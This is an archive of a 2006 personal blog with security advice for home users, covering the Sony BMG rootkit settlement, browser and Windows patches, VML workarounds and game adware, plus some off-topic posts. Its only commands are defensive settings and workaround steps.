Friday, December 22, 2006

Sony, the class action lawsuit about their rootkit, and you . . .

Sony has settled on a US federal level class action lawsuit in response to the rootkits included and silently installed on computers over the last 18 months. There are some important things you should know - even if you don't currently own one of the infected CD's from BMG Sony. (More on that in a bit.)

First, for owners of the infected CD's:

Check the list of CD's that install a rootkit if your computers autoplay is enabled.

The settlement and information.



Here are some key facts as best as I currently understand them from the settlement (I am not a lawyer, these are my personal interpretations and opinions, blah blah blah.)

1) If you join the settlement for the payout - you get a little over $7, and some "free" downloads. You gain the right to use their clean-up tools on your infected computers. You lose all rights to participate in any future actions against Sony BMG regarding the rootkits. You also lose the right to ask for damages for your computers.

2) If you do nothing, you get no payout - but you are still automatically considered part of the settlement and lose all rights to participate on any other class actions against Sony BMG - although if you can afford the lawyers you can still go after them yourselves for specific damages to your computers/network.

3) If you opt out of the settlement by filing a form -online or by mail - you get no payout (like it's really worth anything anyway) but you preserve your right to be included in any future class actions. Oddly, according to the court document - by opting out you also deny yourself the use of the clean-up tools being provided by Sony BMG.

4) You may also choose to complain to the court about why you think this settlement is not the best solution to the problem. If you complain, you must also participate in this settlement. You may not opt-out and complain . . . although I have no idea why.

Personally - I choose to opt-out.

Now for the part for non-current owners of the infected CD's.

Forgetting the paltry payout (is the time you spent on removing that rootkit really worth $7.50?) there is the long term view. This rootkit infected wide audiences - including military computers. It was written so poorly that hackers used it as a backdoor to infect and hide even nastier Trojans.

Let's say hypothetically that several years from now you or your kids find one of these at a garage sale, or a used CD store, or anywhere that old unloved albums get re-distributed. It goes into an older computer, infects it, and the removal tools are long gone . . . it's system rebuild time baby!

Or think of any other scenario where one of the un-returned CD's gets into your system. On loan, inherited, you name it.

What Sony BMG needs to do - in addition to the cleaning tools, is "face the music" (ha ha) and do an actual recall on these buggers.

Here are some final links and tips:

XCP Update/Removal tool This removes the Sony rootkit. I suggest you use the remove feature, not the "update" function.

MediaMax Update/Removal tool The other Sony DRM scheme, with severe bugs. Site wants you to update, but buried deep is a Java application that purports to remove their software entirely. They also provide directions to manually remove their software (recommended!)

Protect yourself from future unexpected CD software by disabling AutoPlay:

Disable AutoPlay for Windows XP Professional
1) Click Start, Run and enter GPEDIT.MSC
2) Go to Computer Configuration, Administrative Templates, System.
3) Locate the entry for "Turn Off Autoplay" and Enable it for All Drives.
4) Reboot

Disable AutoPlay for Windows XP Home
1) Create a plain text file and copy the following into it, then save:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:000000b5


2) Rename the text file's extension from ".txt" to ".reg" (without the quotes)
3) Double click the new REG file and accept the system warning (OK)
4) Reboot


Cheers!

Thursday, December 21, 2006

Firefox 2.0.0.1 released - highly recommended update

If the update is not pushed to you automagically the next time you open Firefox 2.0, then use the menu item "Help.Check for Updates" function.

Firefox 2.0.0.1 release notes.

Fixes five critical vulnerabilities among other bugs. Critical bugs are defined as a vulnerability that can be used to run attacker code and install software, requiring no user interaction beyond normal browsing.

Tuesday, December 5, 2006

What's your real connection speed?


Speed Matters, how fast is your Internet connection?  Test by clicking on the image.



Got broadband? Are you even close to the advertised rate your DSL or Cable Internet Provider says you are getting? Check up on them from time to time and keep them honest.



Some typical results that you should see if your connection is healthy.














Advertised (Down / Up)

Connection Rates

Good (typical)

Downlink Speeds


Good (typical)

Uplink Speeds

DSL 1.5M / 128 K

DSL 3M / 256 K

DSL 5M / 768 K

DSL 9M / 1.5 M



Cable 3M / 256 K

Cable 6M / 256 K

Cable 8M / 768 K

Cable 12M / 1.0 M

Cable 20M / 1.5 M

1,200 Kbps

2,600 Kbps

4,300 Kbps

8,100 Kbps



2,400 Kbps

5,100 Kbps

7,000 Kbps

10,900 Kbps

18,000 Kbps


   120 Kbps

   236 Kbps

   746 Kbps

1,236 Kbps



230 Kbps

230 Kbps

690 Kbps

920 Kbps

1,350 Kbps




Here's another couple of great testing links. You should run multiple tests to different destinations and take the medium-highest readings as more reflective of your actual speed.



Speakeasy Multi-Destination Speed Test



DSL Reports Speedtest Selection


Thursday, November 23, 2006

Gratitude



It isn't what you have in your pocket
that makes you thankful,
but what you have in your heart.


- Author Unknown


Happy Thanksgiving everyone.

Tuesday, November 21, 2006

Dolphins - self-aware? If you think so then act.


Facts about Dolphin Drive Hunts


The petition The goal is 1,000,000 signatures. Currently just under 70,000.


Sometimes live dolphins are hoisted on ropes tied around their tail fins, said Paul Boyle, a former director of the New York Aquarium and now chief executive of the Ocean Project, an umbrella organization for more than 800 institutions worldwide working to increase awareness of oceanic issues through collaborations with zoos and museums.

Dolphins are essentially weightless in water but weigh as much as 800 pounds on land, Boyle said. When they are hung, their backbones, which resemble human spines, are wrenched apart.

"It must be excruciatingly painful," Boyle said, noting that humans complain bitterly when experiencing pain from a ruptured disc in the spine. "When we show people video from past events, every person has the same response. They say it is the most inhumane thing they have ever seen."

Friday, November 10, 2006

Note for Sheldon fans

Sheldon is moving from Comics.com aka dilbert.com to their own independent site. Seems that comics.com obliterated Dave's notice of the move on their site to the public.

If you like the strip, you will love what's happening now that Dave is sponsering his strip. Large format daily strips. The entire archive available online. More reliable daily updates (comics.com had a tendancy to skip one every once in a while - although they would catch up a few days later.)

Here's his announcement on his blog: http://sheldoncomics.com/archive/061106.html

Enjoy!

Wednesday, October 25, 2006

Firefox Tweak Guide updated for v2.0

Everything you wanted to know about customizing Firefox 2.0

The guide is designed specifically for those running Firefox on Windows XP, however most of the tweaks in this guide also apply to Firefox on other platforms.

Opportunity

We must not only strike the iron while it is hot,
we must strike it until it is hot.


- Tom Sharp

Tuesday, October 24, 2006

Firefox 2.0 released!

Edit: it's out now on the official site. Guess they felt ready . . .

For Windows, Mac OS X and Linux i686 platforms.

Get your new and improved Firefox now.

From the source:

Firefox 2.0 will be released Tuesday at 5PM PST.

Upgrade issues/questions
-Can't connect to sites after the upgrade? Check your firewall!
-When will the auto-update happen? (Don't know yet)
-Will it keep my bookmarks and settings? Yes. You can back up your settings to be sure.

What's new?
-Phishing protection - reports if websites are possible scams
-Session saving - if Firefox crashes, when you open it again, you get the option to restore your tabs and windows
-Web feeds - improved interface for web feeds, including the option to subscribe with an external program or service
-Spell checking - squiggly red lines under words you spell wrong
-Search suggestions - common search terms are suggested as you type in the search box

What's fixed?
-Memory leaks
-Searching a page now searches within text fields

Questions
-Does Firefox 2.0 still support Windows 98? Yes. Firefox 3.0 is the release that is planned to drop support for Windows 98.
-Does Firefox 2.0 pass Acid2? Firefox 2.0 is based on the same rendering engine as Firefox 1.5, and so it doesn't pass Acid2. Firefox 3.0 will include a new version of the rendering engine which is expected to pass Acid 2.
-How to I get rid of the close buttons on tabs (go back to how Firefox 1.x was)? Type about:config in the address bar, press enter, and set browser.tabs.closeButtons to 3.

IE 7 and Quickbooks

Got this today:

Dear Valued Client,

As your QuickBooks ProAdvisor®, I wanted you to know that Microsoft will soon be sending out an automatic update to Internet Explorer, replacing Internet Explorer 6 with Internet Explorer 7. This affects users of QuickBooks®: Simple Start, QuickBooks: Basic, QuickBooks: Pro, QuickBooks: Premier, and QuickBooks Enterprise Solutions.

I am recommending that you decline the Internet Explorer 7 upgrade if you are currently using any version of QuickBooks earlier than QuickBooks 2006 Release 8 or QuickBooks Enterprise Solutions 6, Release 8.

Intuit has posted more information for you at this link:

http://www.quickbooks.com/helpcenter/IE7ResourceCenter.aspx

This approach will make sure that you are able to continue to use QuickBooks without any interruptions of the user experience.


The quick skinny:

Microsoft will be adding IE7 to the Windows Update service on the second Tuesday of November. If you are enrolled in automatic updates, you will be upgraded at that time. My understanding is that you will have the option of refusing it, but don't count on it. If you use QuickBooks you should turn off Automatic Updates until this is settled out, use Manual Updates instead and uncheck the selection for IE 7.

It appears that pre-2006 versions of Quickbooks are not compatible with IE 7. Intuit has announced an upcoming fix for V2005, and they are staying "mum" about earlier versions. Possible that anything older than 2005 will not be patched.

If you have Quickbooks 2006, you need to update it to Release 8 - preferably before you install IE 7.

Monday, October 23, 2006

What's wrong with this install?

Before you click the link, how many serious problems can you identify with this installation?



(Yes, the linked site is promoting themselves, but the points they make are valid - if your alarm system looks like that, you should be concerned . . . )

One sick clippy

Would you like some help?

Learning Curves for popular editors

Learning Curves

RFID enabled credit cards storing your info in clear text?

CC company to customer: Those were lab draft editions of our new cards.

Private research to CC company: We ordered cards for ourselves as if we were normal customers for this test.

See the article:
http://news.com.com/Researchers+see+privacy+pitfalls+in+no-swipe+credit+cards/2100-1029_3-6128407.html

Excerpt:

" . . . in tests on 20 cards from Visa, MasterCard and American Express, the researchers here found that the cardholder's name and other data was being transmitted without encryption and in plain text. They could skim and store the information from a card with a device the size of a couple of paperback books, which they cobbled together from readily available computer and radio components for $150.

They say they could probably make another one even smaller and cheaper: about the size of a pack of gum for less than $50.

And because the cards can be read even through a wallet or an item of clothing, the security of the information, the researchers say, is startlingly weak. "Would you be comfortable wearing your name, your credit card number and your card expiration date on your T-shirt?" Heydt-Benjamin, a graduate student, asked."

Friday, October 20, 2006

Adware, the future of gaming?

Really interesting article about another FPS game called SWAT4, with the latest patch from Vivendi, that includes targeted ads within the environment.

http://nationalcheeseemporium.org/

Note the workaround to prevent the game from talking to the ad servers.

Back to BF 2142, there is a good analysis coming very soon on what it does in the background regarding ad rotation while you play. I will post that as soon as it's done.

Thursday, October 19, 2006

IE 7 Vulnerability

That didn't take very long . . .

http://secunia.com/advisories/22477/

"Description:
A vulnerability has been discovered in Internet Explorer, which can be exploited by malicious people to disclose potentially sensitive information.

The vulnerability is caused due to an error in the handling of redirections for URLs with the "mhtml:" URI handler. This can be exploited to access documents served from another web site."

Solution:
Disable active scripting support.

Note, this same bug has been unplugged since April 2006 in your old IE6.x as well . . .
http://secunia.com/advisories/19738/

At least it's not another remote code vuln.

Wi-Fi update for Windows XP SP2

Remember that Wi-Fi hack demo at the Blackhat conference a couple of months ago?

Quietly tonight, Microsoft released a really major update to help prevent that hack method. What's unusual about this release is that it includes new features, something normally reserved for add-on modules or service packs.

It's really part of a feature update to bring Windows XP into parity with domain policy features for the upcoming Windows Server 2003 Service Pack 2 . . . but it's much more than that, and in my opinion, an important update to install. I rather hope that Microsoft places this on their update site, but for now, you have to go the the KB article on the topic to get the patch.

IE 7 goes gold

Just a heads up. Internet Explorer 7 is official now.

http://www.microsoft.com/windows/ie/default.mspx

Wednesday, October 18, 2006

More on the game spyware fiaso

Update to my previous post about Battlefield 2142 . . .

Some serious problems being discussed over on HardOCP about the issue.

1) The advert company in question has responded, and just as I and others guessed, Geolocation by IP address is indeed how they have implemented their targeted ads for display within the game.

2) The warning about the "adware" is INSIDE the box, not outside. Buyers have to break the seal before they get full disclosure from EA, which makes it impossible to return the game to most retailers for a refund.

3) Worse, the Microsoft Critical Update MS06-051: ''Vulnerability in the Windows kernel could result in remote code execution'' breaks the game, and Electronic Arts is recommending UNInstalling that Microsoft patch.

I cannot stress this enough. DO. NOT. UNINSTALL. THAT. PATCH! The patch in question was released just this last August and blocks a very serious security vulnerability in Windows that is being actively exploited to introduce unpatched computers to several very nasty Trojans, key loggers and rootkits.

Please tell your friends. Tell your co-workers. Spread the word about this mess to other forums and gamers that you know. The hope I have is that if everyone makes enough noise, EA will release a patch that "fixes" this and removes the spyware.

Windows Vista EULA and DIY systembuilders, at odds?

Ran across this last week, and the more I think about it, the more concerned I get. I am one of those power users that is always tweaking the system, replacing key components with newer, better options on the same system. I also have been required to reactivate my XP system several times after making a major upgrade (network card replacements seem to trigger it every time), or after re-installing the system (same disk, same PID, same system but with newer mainboard).

An excerpt: "From past experience with Windows XP, a motherboard swap triggers a re-activation. I've successfully reactivated the same copy of Windows XP a number of times after a motherboard swap with no problem. But the above terms seem to indicate that the third activation will fail, meaning you, dear reader, get to feed the Microsoft machine more money.

Or not.

If anything could be calculated to drive the DIY community away from Windows, this would be it. As it stands now, reactivating after installing a new motherboard is a minor pain, but not a big deal. And what about when you need to swap out a motherboard simply because the hardware failed? Does that count as well?"


If I read the EULA correctly, this will not be a problem if I simply want to re-install Vista to the exact same hardware (good cure for massive rootkit or virus infections) nor should it be a problem if I restore a clean image to that same system. But if I upgrade key components in the future . . . what will happen?

Read the article, tell me what you think.

Spyware, now coming to a game near you!

Electronic Arts has shipped their newest game: Battlefield 2142.

I was pretty interested in this until I discovered how they will be implementing their controversial in game advertising.

A small slip of paper in the disk case reads:

"The software may incorporate technology developed by IGA Worldwide, the advertising technology. The purpose of the advertising technology is to deliver in-game ads when you use the software while connected to the Internet. When you use the software while connected to the Internet, the advertising technology may record your IP address and other anonymous information. That advertising data is temporarily used by IGA to enable the presentation and measurement of in-game ads and other in-game object which are uploaded temporarily to the your PC or game console, and change during online gameplay. The advertising technology does not collect personal or identifiable information about you."

Let's step back and analyze that with some knowledge of modern internet tracking technology. First, dynamic IP addresses more and more are geographically assigned by your ISP. If I enter my IP address into this search page, and click the "Find City" button (and it's just one site among many) it knows where I am within about a mile radius. It knows my ISP, my country, state, town, zip code and even the rough neighborhood in which I live. It's trivial for advertisers to use that info to target local ads to my game.

If I have a static IP registered to my name or business, it's almost as easy to know my exact address, and from that I can back-search to get my name, email, phone number, age, spousal status, land ownership records, driving habits, legal records, etc.

You getting worried yet? You should! This is classic spyware/adware at it's very worst. Even if they don't store the IP address permanently, (and who believes that?) they already know more than they should about you just from playing a game!

My advice, skip this one.

Updated news on this issue.

Sunday, October 8, 2006

OT: Warning - A Short Political Rant

Hasn't anyone else figured out that the entire Foley episode is another distraction? Given that certain leaders KNEW about the mans personal tastes and actions for YEARS in advance . . . and sat on the info, it should be obvious that they were saving the news for a rainy day. Just like a good poker player.



We need to be keeping a very watchful eye on the administration right now. Master-Gate is a distraction. It would be easy to state it's to distract us from the suspension of habeas corpus and other cancellations of the Bill of Rights in WA-DC, but I fear worse is coming, quietly, in the dark of night while the bright lights of the media focus on Foley, the likes of A N Smith, etc.




by Horsey on the Seattle PI

Thursday, October 5, 2006

Upcoming MS fixes on October 10

Found in my inbox today, one of the critical fixes coming October 10th will be for that nasty WebViewFolderIcon ActiveX to Windows Shell vulnerability that I mentioned last week.

********************************************************************
Title: Microsoft Security Bulletin Advanced Notification
Issued: October 05, 2006
********************************************************************

Summary
=======

On 10 October 2006 Microsoft is planning to release:

Security Updates

. Six Microsoft Security Bulletins affecting Microsoft Windows.
The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer. Some of these updates will require a restart.

. Four Microsoft Security Bulletins affecting Microsoft Office.
The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer. These updates may require a restart.


. One Microsoft Security Bulletin affecting Microsoft .NET
Framework. The highest Maximum Severity rating for this is Moderate.
These updates will be detectable using the Microsoft Baseline Security Analyzer and the Enterprise Scan Tool. These updates may require a restart.


Microsoft Windows Malicious Software Removal Tool

. Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center.

AV standards: out with the old, in with the new?

AV companies tend to rise and fall in effectiveness as often as the stock market. For some time now I have really come to rely on eTrust, a product by Computer Associates. I still like their corporate AV offering (and still loath their so-called "home" version.)



But there is a new leader in town called AntiVir, by Avira, and I have to say I was impressed during my testing, both in terms of AV protection / spyware prevention and in system resource usage (very low.) It's also been garnering praise in some security professional circles.



(Note that the score table on that site shows a combined result for traditional virus protection plus malware protection, although not all the products they list do both . . . the version of AntiVir they tested does both, the versions of eTrust they tested are AV only.)



It's "for sale" version includes both malware/spyware and AV protection. They also have a free for personal use edition that only includes AV protection - and it's not a limited time offer, but really free.



The free edition of AntiVir: http://www.free-av.com/



Antivir Personal (home) Premium edition: http://www.avira.com/en/products/antivir_personaledition_premium.html



Recommended.

AV FUD and Vista

"Windows Security Center is leveling the playing field and helping customers find more options for "protection."



More technical details on kernel protection.



What I find frustrating is that products like (cough - certain really big AV firms)disable alerts from Windows Security Center (and if you uninstall their product, they generally fail to re-enable it.) thus preventing the end user from ever seeing the several other, excellent - and free - choices for AV protection presented by the WSC. None of which, by the way, are a Microsoft product . . .

Tuesday, October 3, 2006

Like watching a train crash . . .

This is a slightly sped up video of a computer being massively infected. The infections are real, some of the special effects are dramatized (but based on real events). You can thank SiteAdvisor (recently acquired by McAfee) for the video.





Friday, September 29, 2006

Windows Shell Vulnerability

Vulnerability in the Windows Shell could allow remote code execution.

The vector is Microsoft's WebViewFolderIcon ActiveX control (Web View). The vulnerability exists in Windows Shell and is exposed by the Web View ActiveX control.

Details and workarounds at http://www.microsoft.com/technet/security/advisory/926043.mspx

Public release of exploit code:
http://security.ithub.com/article/Exploit+Code+Published+for+Unpatched+IE+Vulnerability/189904_1.aspx

I would expect that with the public release of the vulnerability details and sample exploit code, we will see rising attacks on this over the coming weekend. It's recommended that people comfortable with editing the Registry go to that first Microsoft link and use the first work around (set the kill bit on the Active X control).

Tuesday, September 26, 2006

VML Vulnerability: Official fix released today

Microsoft has quietly released a patch for the VML exploit today. Get it via their update service at http://windowsupdate.microsoft.com/ or wait for your automatic updates to notice it . . . personally I would not wait.

If you previously used any of the mitigating workarounds for this exploitable bug, make sure you reverse or rollback that workaround before applying the official patch.

Saturday, September 23, 2006

Friday, September 22, 2006

VML Vulnerability, workarounds and a test


Many of you may have heard about a new Zero Day Vulnerability that is being exploited on a large scale around the Internet. Fully patched users of Windows 2000 SP4, Windows XP SP1 and SP2 and both versions of Windows 2003 are exposed to the VML flaw. Infections are rising rapidly - you are at risk if you surf the web.



Yesterday I even found a "trusted" page that was serving ad banners that infected victims' computers by this method. (No link will be provided.)



Microsoft has announced they intend to provide a patch on October 10th, with a slight chance they may release it earlier - but no promises.



VML is not used widely on the Internet yet, with the notable exception of a very few graphically advanced web sites, the bad guys and Google Maps. Regarding Google, if you disable VML it will revert to normal graphic overlays if you bring up a map, so disabling VML will not block your use of their map service.



There are a few workarounds listed on Microsoft's security bulletin. The one I recommend from their bulletin seems to cover all the vectors perfectly. It involves unregistering the VML shared library. To deploy this workaround, click Start, select the Run box, and copy the following into the Open field and click OK. You should see a message appear that says the unregister succeeded.



regsvr32 -u "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"



Using this work-around will cause sites that depend solely on VML to fail. Later, when the patch from Microsoft is released, you can reverse the workaround (do it before you apply the upcoming patch) by typing into the same run window the following similar command (note the absence of the "-u" in the string.)



regsvr32 "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"



Other workarounds involve disabling JavaScript and ActiveX scripting, but doing that really messes up your web experience for many sites, much more so than simply disabling VML.



And finally there is an excellent third party patch available from Zert that leaves VML functional but closes the vulnerability. On that same page is a link that tests your browser to see if it's vulnerable or not. Use at your own risk, as Microsoft does not endorse and does not recommend it's use. In spite of that, I am now using this 3rd party patch and so far I highly recommend it for home and small office users. Don't unregister the VML DLL as described above if you decide to use this patch. Also, you should rollback this fix (method provided with the patch download) before patching to Microsoft's official critical update for the issue - when it's finally released.

Wednesday, September 6, 2006

Back in town

Left 9 days ago for a conferance and got caught in some serious stormy weather, delayed flights, the whole deal.

Whoo.

Sooooo much stuff on the security front happened and is happening. Once I get unpacked and cleaned up will start posting again.

Tuesday, August 22, 2006

Cool toy . . . NASA's World Wind

Not really security related but . . . for those into world wandering from the comfort of your office chair;



If you are a fan of Google Earth, then you may be interested in checking out NASA's World Wind open source project.



If you like what you see, and it works on your system (results vary) then definitely grab the Cache Pack and plug-ins available from the community World Wind Wiki site.



World Wind allows any user to zoom from outer space into any place on Earth. World Wind leverages satellite imagery and elevation data to allow users to experience Earth terrain in visually rich 3D, just as if they were really there. Virtually visit anyplace in the world. Look across the Andes, into the Grand Canyon, over the Alps or along the African Sahara.



Which sounds exactly like Google Earth . . . but then these details emerge:



Blue Marble - World Wind has a full copy of the Blue Marble, a spectacular true-color image of the entire Earth. Put together from data of a variety of satellites such as Terra and Aqua, the Blue Marble can be seen in all its glory at 1 km per pixel resolution. Blue Marble Next Generation is streamed from the NASA servers at 0.5 km per pixel and in 12 versions, one for each month of year.



Landsat - LandSat 7 is a collection of images from 1999-2003 at an impressive 15 m per pixel resolution. LandSat 7's resolution makes it possible to see your own city, neighborhood, or landmarks in your vicinity. Seeing the whole globe like this puts the world in context with scientifically accurate data. You can view LandSat imagery in visible colors or in False Color bands.




Highly recommended!



Edit: Ooooh, and it includes the Moon and Mars in the full install package. :grin:

Saturday, August 19, 2006

New IRS scams on the horizon

Since 2004 the IRS and Senate have been pushing new laws for approval that would allow them to outsource unpaid tax bills to private (non-government) collection agencies. In spite of resistance to the plan by the House of Representatives, it appears that the rules have been quietly approved by the Bush administration. (registration required on that last link)



In two weeks, the IRS will turn over some 12,000 names to the first three collection agencies with whom they have contracted. Approximately ten agencies in total are expected to be IRS approved by the beginning of 2008 - and they will be given at least 350,000 names.



Why is this a security related article? Because you know that the scammers and phishers will start coming out of the foul cesspools of the dark side of the Internet to try and spoof people into thinking they owe the IRS money, and of course they will make it look attractive to the victim by saying that they can reduce the tax-bill if said victim agrees to send a check or credit card payment "right-now" to the con artist. Meanwhile - if the victim does owe back-taxes to the IRS - they will still be liable to the IRS and authorized collection agencies. Being conned does not lessen ones legal obligation to pay the correct authority.



You should know the following facts to protect yourself from scammers while staying on the legal side of the real collection agencies:




1) The approved agencies are NOT allowed to communicate with you via the Internet. No email in other words. This means that ALL emails that purport to be IRS collection attempts are automatically phishing spam and should be summarily ignored and deleted.



2) The collection agencies may not ask you to send payment directly to them. Payments to satisfy in part or whole any back taxes owed will ALWAYS be sent directly to the United States Treasury. The authorized collection agencies are not allowed to collect funds directly, they can only pester the heck out of you until you pay.



3) The list of authorized collection agencies in 2006 (for now, will expand in 2007~08):

- Linebarger Goggan Blair & Sampson of Austin, Texas

- Pioneer Credit Recovery of Arcade, New York (a division of the SLM Corporation)

- CBE Group of Waterloo in Iowa



Hope this helps someone . . .

Weekend rambling thoughts

They who dream by day
are cognizant of many things
which escape those who dream
only by night.
In their gray visions
they obtain glimpses of eternity.

- Edgar Allan Poe

Friday, August 18, 2006

Microsoft patches patch - patchy schedule announced

Apparently a flaw in the much publicized MS06-040 Server component patch released this August is preventing some users from receiving more than 1 GB of data in size. It's impacting certain commercial software, like Microsoft Navision and Dynamics business applications.



This does NOT apply to 32-bit versions of Windows XP. Users of Windows Server 2003 x32, and XP x64 that deal in large file transfers or data requests might need it. Microsoft is recommending that you wait for the official release in September unless you are experiencing the problem.



If you are among the unlucky ones, get the MS06-040 "beta-quality patched patch" here - and good luck. (Windows Passport or Live login may be required.)



Additionally, there is a flaw impacting users of Windows 2000 SP-4 and Windows XP SP-1 that updated with the August MS06-042 patch which causes Internet Explorer to crash when visiting some sites using HTTP 1.1. Windows XP SP-2 and Server 2003 do not have the problem.



Microsoft plans to release the fixed version of this bug out of cycle on August 22nd.

Thursday, August 17, 2006

The worms crawl in, they don't crawl out

Please pass the message on to your friends to patch their Windows 2000, XP and Server 2003 machines. (Have I harped on this enough yet?)



You should also make sure your anti-virus solution is up-to-date and that your subscription to it is in good standing. As of this writing, only about one-third of all AV venders have updated signatures to catch this particular Trojan. Expect the rest to be up to date within the week.



A Trojan is spreading around the internet this week that exploits unpatched machines, specifically MS06-040, the server component vulnerability. Called W32.Wargbot, IRC-Mocbot!MS06-040, W32/Cuebot-L, Backdoor.Win32.IRCBot.st or WORM_IRCBOT.JL by various AV venders, on infection it immediately calls out over the Internet via IRC and receives instructions to download a spam bot or Trojan called Win32.Ranky.fv. Victims machines then become mass email spam servers for a large botnet. The victims machine also continues to check the IRC command center for additional instructions, which means that the criminal that created this mess could download almost anything, at anytime, to your machine.



Silently and without your permission.



Statistics (pulled out of my rear end just now) indicate that typically only 35% of all home or small office Windows users are on Automatic Updates. The rest either update manually - but not always timely, or have never updated at all. This does not include corporate domains, where updates are generally controlled via WSUS or SMS or the like, and are tested then rolled out to end-users on their own schedule.



The potential for damage is great. See my previous posts for links to more information on how to get yourself immunized against the attack.

Tuesday, August 15, 2006

Powerpoint flaw allows remote code execution

Another reason to patch up, but if you use the default settings for Windows Automatic Updates, you may not have this fix installed yet.



This is a serious flaw in Microsoft's PowerPoint, with several Trojans exploiting it already in the wild. One of the more "interesting" flavors is Win32/Fantador.E!Backdoor [Trojan]-- which drops a LSP into the victims Winsock TCP stack and allows complete remote administrative access to the system.



All versions of Powerpoint are vulnerable until patched, although Microsoft claims that the free Powerpoint 2003 Viewer does not have the flaw. So if you receive an unexpected PPT file it may be safer to open it in the viewer rather than Powerpoint.



The recommended methods to get this patch are:



Visit the Office Update site and install all available updates. You may have to go through the update process several times if you are behind on your Microsoft Office service packs. Repeat until you see that there are no remaining available updates. You may need your original office installation disks handy to successfully complete this process.



If you wish you may upgrade 'Windows Update' to the free 'Microsoft Update Service,' which turns on extended updates on the regular Windows Update site. That will allow you to install updates for Office in addition to the Windows patches from one place. Additionally - by turning on this feature - and if you use Automatic Updates, then Microsoft Office will be included in your automatic update schedule and silent downloads into the future. (Note that if you have already turned on this feature, you will only see the normal Update site when you click the link above.)

Monday, August 14, 2006

Windows flaw already under attack

"The bot, and a second variant detected Sunday, appear to use the Windows Server service flaw (MS06-040) to spread to computers that have not yet been patched for the issue. Microsoft fixed the flaw last week."



Again to all: if you have not yet verified that your Windows system is fully patched as of last week Tuesday - including the ultra-critical MS06-040 security fix - stop what you are doing and get it done now. If your automatic updates are working, then you should be okay.



The good news (so far) is that the attacks seem to be very limited in scope - not like the widespread worms that exploited past flaws.

Thursday, August 10, 2006

Homeland Security says patch your Windows (or else??)

The Department of Homeland Security released a special press release stating that everyone should apply the Microsoft MS06-040 security patch: Vulnerability in Server Service Could Allow Remote Code Execution (921883) released last Tuesday. You can also obtain that patch by ensuring you are updated via Microsoft's Express Update service.



"The Department of Homeland Security (DHS) is recommending that Windows Operating Systems users apply Microsoft security patch MS06-040 as quickly as possible. This security patch is designed to protect against a vulnerability that, if exploited, could enable an attacker to remotely take control of an affected system and install programs, view, change, or delete data, and create new accounts with full user rights.



Windows Operating Systems users are encouraged to avoid delay in applying this security patch. Attempts to exploit vulnerabilities in operating systems routinely occur within 24 hours of the release of a security patch. This vulnerability could impact government systems, private industry and critical infrastructure, as well as individual and home users."






Update 1

CNet reports: "Microsoft has seen a "very limited attack" that already used the newly disclosed flaw, the software maker said Tuesday.



Overnight, some hacker toolkits were updated with code that allows researchers to check for the flaw and exploit it, said Neel Mehta, a security expert at Internet Security Systems in Atlanta.



"This is a very serious vulnerability," Mehta said. "At the moment, this exploit is being used in targeted attacks to compromise specific systems. However, there is nothing about the nature of the vulnerability that prevents it from being used in a much more widespread fashion as part of a worm."






Update 2

It appears that Microsoft may be convinced that the next Really Big Worm - coming soon to a computer near you - will exploit this problem.



It's a good thing that many people now have firewalls that by default block ports 139 and 445. That will help reduce the propagation of any worm looking for this exploitable hole. We shall see . . .

Why commercial reviews of AV products are misleading

Windows Secrets just posted a rant about certain big-name commercial review sites and their lack of testing methodology when ranking Anti-Virus and Counter-Spyware products and suites.



One has to wonder just how objective these places are -- when they are taking huge advertising dollars from the software companies that produce the products they are reviewing?



But the real point revealed by the article is that signature based protection applications are no longer effective for zero-day attacks. And this last year, it seems that every day has been a zero day . . .



The latest greatest feature to mitigate this problem is so-called "behavioral protection." Certain AV products are adding real time analysis of suspicious actions to catch unknown viruses and malware, even before the signature is updated. Combined with signatures, this method should improve your chances of resisting attacks and new infections.



Only two products have this feature, more will have it in 2007. Those two are:



- Zone Labs OSFirewall

- Panda TruPrevent



Of note is that Zone Labs OSFirewall licenses CA's eTrust Anti-Virus as their virus component in the suite. Yet eTrust was not reviewed at all by these commercial sites. It also happens to be my personal favorite AV protection application based on real-world results for myself, my clients and my last big employer - who started using it on their entire corporate network right after they got "Blasterized" several years ago.

Wednesday, August 9, 2006

Humor: New Microsoft Bug Prevention and Correction Program (WSYP)

A little offbeat geek humor for your viewing pleasure.



Revenge of the end user?

More on the Blackberry handheld exploit

Update!



The malware researcher who announced that Blackberry handhelds could be used to gain access to corporate networks that support services for the device plans to release the exploit code to the public.



"Public" in this case means that script kiddies and online organized crime rings will most certainly pick up the code and begin to use it for their own gain. Hopefully Research in Motion will provide patches to their server products to mitigate the risk.



What should end-users do?



End users need to be very cautious about opening unexpected attachments in email received on their Blackberries - even if those attachments come from known contacts. They should also be sure that their device does not fall into someone else's hands - even for a short time, as the exploit can easily be installed with physical access to the handheld.



On the IT Admin side of the equation:



"By administering the various security tools available in its systems, IT administrators can greatly reduce the potential for any attack by banning or limiting the privileges of various types of applications, company officials said.



"I wouldn't characterize this as a flaw, but the ability to run a program on the network," said Scott Totzke, director of RIM's Global Security Group, in Waterloo, Ontario. "We have tools [that can be used] to manage and control third-party applications, and administrators can close the door to third-party applications completely, or use a whitelist approach that can allow them to be very granular in what they might allow."




So the question to all you IT folks, have you implemented strong security policies on your Blackberry servers?


Tuesday, August 8, 2006

It's that time . . .


My professional network security and computer consulting resource website is over two years old, it's stale and looks outdated. It's also not very well optimized for search engine placement. (Old theories tried and forgotten.)



I really like the look and feel of slick graphical buttons that change state when you mouse_over and on_click them. It's cool. But it's not good for my search sites, and I am losing out on traffic because I use them. Trouble is, I can't find a decent looking template for text links to pages within, they all turn out cluttered and confusing to the end-user.



One of the "modern" challenges SEO experts face is that internal site links really need to be in text for most search engines to crawl your site properly. If you use buttons, they generally (not always) skip those links. Worse, search engines give preferential treatment to longer descriptive text links like the first link above. They also seem to give higher scores for bold and heading formatted text. These tricks work great for links within the content, but not for site navigation. JavaScript and ActiveX are also out, for similar reasons. Somewhere between is a balance.



How have you solved this issue, assuming any of you have succeeded at reaching a clean looking, easily managed, slick text only navigation system that does not use graphical buttons, Java or ActiveX?

Sunday, August 6, 2006

Got Blackberry? Your network may be 0wn3d

